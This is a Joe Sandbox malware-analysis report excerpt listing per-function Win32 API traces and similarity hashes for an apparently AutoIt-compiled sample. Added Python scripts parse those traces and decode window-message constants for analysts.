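The per-function "APIs" records above are the part of a Joe Sandbox report an analyst usually wants in machine-readable form: the call order is what feeds a detection rule or a cross-sample comparison, and the raw argument values (for example `PostMessageW(?,00000112,0000F060,00000000)`, i.e. WM_SYSCOMMAND with SC_CLOSE, followed by a WM_COMMAND post) only mean something once decoded. The following parser is an added example written for this page; it is not Joe Sandbox code, the regular expression is derived only from the record lines visible in the report, and the `call_signature` hash is a hypothetical clustering aid of my own, unrelated to the report's "API ID" or fuzzy-hash fields. The sample input is the first two records copied from the page.

```python
"""Parse Joe Sandbox per-function 'APIs' records into structured calls and
decode the window-message constants passed to PostMessageW/SendMessageW.

Added example, not Joe Sandbox code. The line format (regex below) is an
assumption based on the report lines shown on this page.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: two 'APIs' records copied from the report above.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
• GetFocus.USER32 ref: 004696E0
• GetDlgCtrlID.USER32(00000000), ref: 004696EB
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
Strings
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
Strings
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix,
# API.MODULE, optional "(args)", then ", ref: XXXXXXXX".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Well-known winuser.h constants (only the ones needed to read these records).
WM_NAMES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}
SC_NAMES = {0xF020: "SC_MINIMIZE", 0xF030: "SC_MAXIMIZE", 0xF060: "SC_CLOSE"}
MESSAGE_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]      # None where the sandbox printed '?' (value unknown)
    ref: int                       # address of the call site
    subcall_of: Optional[int] = None  # function the call sits in, if a nested subcall

    def decode_message(self) -> Optional[str]:
        """Name the message (and SC_* code for WM_SYSCOMMAND) if this is a message post."""
        if self.api not in MESSAGE_APIS or len(self.args) < 2 or self.args[1] is None:
            return None
        msg = self.args[1]
        name = WM_NAMES.get(msg, f"0x{msg:04X}")
        if msg == 0x0112 and len(self.args) >= 3 and self.args[2] is not None:
            name += "/" + SC_NAMES.get(self.args[2], f"0x{self.args[2]:04X}")
        return name


def parse_records(text: str) -> List[List[ApiCall]]:
    """Split the report text into per-function records (each 'APIs' ... 'Strings' block)."""
    records: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if stripped == "Strings":
            current = None
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if not m:
            continue  # hashes, dump sources and other non-call lines
        raw_args = m.group("args")
        args = [] if raw_args is None else [
            None if a.strip() == "?" else int(a, 16) for a in raw_args.split(",") if a.strip()
        ]
        current.append(ApiCall(
            api=m.group("api"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return records


def message_summary(record: List[ApiCall]) -> List[str]:
    """Decoded window messages posted by one function, in call order."""
    return [d for d in (c.decode_message() for c in record) if d]


def call_signature(record: List[ApiCall]) -> str:
    """Hypothetical clustering key: SHA-256 over the ordered API names of the
    function's own calls (subcalls excluded). Not the report's 'API ID'."""
    names = ";".join(c.api for c in record if c.subcall_of is None)
    return hashlib.sha256(names.encode()).hexdigest()


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(f"function {i}: {' -> '.join(c.api for c in rec if c.subcall_of is None)}")
        for c in rec:
            decoded = c.decode_message()
            if decoded:
                print(f"  {c.ref:08X} {c.api}: {decoded}")
        print(f"  signature: {call_signature(rec)[:16]}...")
```

Feed it the whole "Functions" section of an exported report rather than the two sample records to get one signature per function; comparing those keys across samples is a cheap way to spot shared runtime or packer code before looking at the fuzzy hashes.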
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                                                                                                                                                                                                                                                                                                                • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4085615965-3440237614
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
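The API list of the function above only shows raw message numbers, so it is easy to skip over what the routine does. Decoded against the documented Win32 constants (winuser.h: EM_GETSEL = 0x00B0, EM_SETSEL = 0x00B1, EM_REPLACESEL = 0x00C2, WM_DROPFILES = 0x0233), it is a WM_DROPFILES handler that counts the dropped files, copies each path into a MAX_PATH (0x104) buffer, and inserts it into an edit control with EM_REPLACESEL; the string IDs @GUI_DRAGFILE, @GUI_DRAGID and @GUI_DROPID are AutoIt's GUI drag-and-drop macro names, which is consistent with an AutoIt-compiled stub. The script below is an added example, not part of the Joe Sandbox report: it parses the "APIs" bullet lines copied from the record and annotates each call. One assumption is marked in the code: the report prints the second DragQueryFileW argument as 000000FF, which is read here as a sign-extended push -1 (iFile = 0xFFFFFFFF, the documented file-count query); confirm that against the disassembly before relying on it.

```python
"""Annotate a Joe Sandbox 'APIs' trace of a WM_DROPFILES handler.

Added example, not code from the sandbox report. The message-ID table holds
documented Win32 constants; TRACE is copied from the record above.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Documented Win32 constants (winuser.h); not taken from the report.
WINDOW_MESSAGES = {
    0x00B0: "EM_GETSEL",
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    0x0233: "WM_DROPFILES",
}
MAX_PATH = 0x104

# API bullet lines copied from the record above (sub-call lines left out).
TRACE = """\
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
• _wcscat.LIBCMT ref: 0046F3BC
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
• SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
• DragFinish.SHELL32(?), ref: 0046F414
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
"""

# "• Api.MODULE(args), ref: ADDR" or "• _crtfunc.LIBCMT ref: ADDR"
LINE_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str


def parse_trace(text: str) -> List[ApiCall]:
    """Turn the bullet lines into ApiCall records; unparsable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref")))
    return calls


def _imm(arg: str) -> Optional[int]:
    """Integer value of a resolved hex immediate, None when the report shows '?'."""
    return None if arg == "?" else int(arg, 16)


def message_name(arg: str) -> Optional[str]:
    """Map a SendMessage/DefDlgProc message argument to its documented name."""
    val = _imm(arg)
    if val is None:
        return None
    return WINDOW_MESSAGES.get(val, "0x%04X" % val)


def decode_call(call: ApiCall) -> str:
    """Explain one call in terms of the documented constants."""
    if call.api == "SendMessageW" and len(call.args) >= 2:
        return "%s: %s" % (call.api, message_name(call.args[1]) or "message id not resolved")
    if call.api == "DefDlgProcW" and len(call.args) >= 2:
        return "%s: default handling for %s" % (call.api, message_name(call.args[1]))
    if call.api == "DragQueryFileW" and len(call.args) >= 4:
        idx = _imm(call.args[1])
        # Assumption: 000000FF is a sign-extended push -1, i.e. iFile = 0xFFFFFFFF,
        # which with cch = 0 asks for the number of dropped files.
        if idx is not None and idx & 0xFF == 0xFF and call.args[3] == "00000000":
            return "%s: query number of dropped files (cch=0)" % call.api
        if call.args[3] == "%08X" % MAX_PATH:
            return "%s: copy path of file %d into a MAX_PATH buffer" % (call.api, idx)
        return "%s: cch=%s" % (call.api, call.args[3])
    if call.api == "DragFinish":
        return "%s: release the HDROP handle" % call.api
    if call.api == "DragQueryPoint":
        return "%s: get drop coordinates" % call.api
    return "%s (%s)" % (call.api, call.module)


def decode_trace(text: str) -> List[str]:
    """Annotated line per call, prefixed with the reference address."""
    return ["%s %s" % (c.ref, decode_call(c)) for c in parse_trace(text)]


def messages_seen(text: str) -> Set[str]:
    """Set of resolved window-message names used by the function."""
    names = set()
    for c in parse_trace(text):
        if c.api in ("SendMessageW", "DefDlgProcW") and len(c.args) >= 2:
            n = message_name(c.args[1])
            if n:
                names.add(n)
    return names


if __name__ == "__main__":
    for line in decode_trace(TRACE):
        print(line)
```

The same parser works on any function record in the report; only the constant table needs extending for other message families.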
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
• Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
• Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
• Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
APIs
• _memset.LIBCMT ref: 004669C4
• _wcsncpy.LIBCMT ref: 00466A21
• _wcsncpy.LIBCMT ref: 00466A4D
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcstok.LIBCMT ref: 00466A90
  • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
• _wcstok.LIBCMT ref: 00466B3F
• _wcscpy.LIBCMT ref: 00466BC8
• GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
• _wcslen.LIBCMT ref: 00466D1D
• _memset.LIBCMT ref: 00466BEE
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _wcslen.LIBCMT ref: 00466D4B
• GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: X$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3021350936-1944015008
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1504565804-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
• Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
• _wcscpy.LIBCMT ref: 0045CE14
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
• Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
• Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
• Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
• Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
APIs
• _memset.LIBCMT ref: 00455127
• GetMenuItemInfoW.USER32 ref: 00455146
• DeleteMenu.USER32(?,?,00000000), ref: 004551B2
• DeleteMenu.USER32(?,?,00000000), ref: 004551C8
• GetMenuItemCount.USER32(?), ref: 004551D9
• SetMenu.USER32(?,00000000), ref: 004551E7
• DestroyMenu.USER32(?,?,00000000), ref: 004551F4
• DrawMenuBar.USER32 ref: 00455207
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
• String ID: 0
• API String ID: 1663942905-4108050209
• Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
• Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
• Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
• Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
• String ID:
• API String ID: 1481289235-0
• Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
• Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
• Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
• Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
